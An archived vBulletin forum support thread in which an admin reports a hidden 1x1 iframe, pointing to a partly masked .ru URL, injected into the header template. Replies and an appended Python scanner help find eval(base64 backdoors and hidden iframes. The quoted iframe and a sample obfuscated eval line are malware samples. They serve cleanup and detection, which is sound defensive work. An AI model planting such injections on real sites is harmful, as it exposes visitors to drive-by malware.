vb.org Archive


GTX2 11-01-2011 11:00 PM

help with unauthorized entries on my forum - badware
 
Need some help from you guyz....
Today when browsing my forum website I got a warning from Google telling me I had some badware code somewhere. After checking Google Webmaster Tools, they said I had this code somewhere on my website:

Code:

<iframe width=1 height=1 frameborder=0 src=http://www.**-***.ru/vb/legacy/phra.php></iframe>
(removed some letters due to security reasons)

After making a search on my templates, I saw this code was entered in my header template!!!
Removed immediately, but now I would like to investigate how someone could have gained access to my templates and my board, as I am the only admin accessing the boards. AdminCP logs say no access from third parties. Where can I check for other unauthorized entries?


If posting in wrong section, please forward
Thank you !

ForceHSS 11-02-2011 01:20 AM

Check logs with host.

Simon Lloyd 11-02-2011 02:38 AM

Sounds like you have a PHP file that could have added some eval(base64 code. You will need to search all your files for eval(base64 or even just base64 to be able to remove the lines, or just overwrite the core vBulletin files (if you haven't modified them) with new ones via FTP in ASCII mode, but unless you find the PHP file (not one of vBulletin's) that's causing it, it's going to come back!

You can check vBulletin's files using the diagnostics in AdminCP > Maintenance > Diagnostics > Suspect File Versions. Run this and if vBulletin finds code that doesn't belong there it will flag the file up to you, but remember it will not show you which 3rd party PHP file is causing the issue.

Also check here https://www.vbulletin.com/forum/show...ms-More-Secure for tips on preventing it in the future.
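
The file search suggested above, as an added example that is not part of the original thread: a small scanner that walks a forum directory and flags `eval(base64`, any other `base64` use, and 1x1 iframes like the one quoted in the first post. The file extensions, the iframe rule and the sample files are assumptions made for illustration; plain `base64` hits are low-confidence and need manual review.

```python
import pathlib
import re
import tempfile

# Ordered most specific first; the first pattern that matches a line labels it.
PATTERNS = {
    "eval-base64": re.compile(r"eval\s*\(\s*base64", re.I),
    "base64": re.compile(r"base64", re.I),
    # iframe whose width and height are both 0 or 1, like the one quoted in the thread
    "hidden-iframe": re.compile(r"<iframe\b(?=[^>]*\bwidth\s*=\s*[\"']?[01]\b)"
                                r"(?=[^>]*\bheight\s*=\s*[\"']?[01]\b)[^>]*>", re.I),
}

def scan_text(text):
    """Yield (line_number, label) for each matching line; first pattern wins."""
    for lineno, line in enumerate(text.splitlines(), 1):
        label = next((l for l, rx in PATTERNS.items() if rx.search(line)), None)
        if label:
            yield lineno, label

def scan_tree(root, exts=(".php", ".html", ".htm", ".js")):
    """Walk root; return sorted (relative_path, line_number, label) findings."""
    findings = []
    for path in pathlib.Path(root).rglob("*"):
        if path.is_file() and path.suffix.lower() in exts:
            rel = path.relative_to(root).as_posix()
            text = path.read_text(encoding="utf-8", errors="replace")
            findings += [(rel, n, label) for n, label in scan_text(text)]
    return sorted(findings)

def demo():
    """Scan a constructed sample tree (made-up files, not from the thread)."""
    samples = {
        "index.php": "<?php\nrequire 'global.php';\n",
        "images/cache.php": "<?php\n@eval(base64_decode('ZWNobyAxOw=='));\n",
        "includes/mail.php": "<?php\n$body = base64_decode($part);\n",
        "header.html": "<iframe width=1 height=1 frameborder=0 src=http://example.invalid/x.php></iframe>\n",
        "video.html": "<iframe width=560 height=315 src=https://example.invalid/v></iframe>\n",
    }
    with tempfile.TemporaryDirectory() as root:
        for rel, body in samples.items():
            path = pathlib.Path(root, rel)
            path.parent.mkdir(parents=True, exist_ok=True)
            path.write_text(body, encoding="utf-8")
        return scan_tree(root)

if __name__ == "__main__":
    for rel, lineno, label in demo():
        print(f"{rel}:{lineno}: {label}")
```

This covers files on disk only; the iframe in the original post was found through a template search, which a file scan does not replace.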


All times are GMT.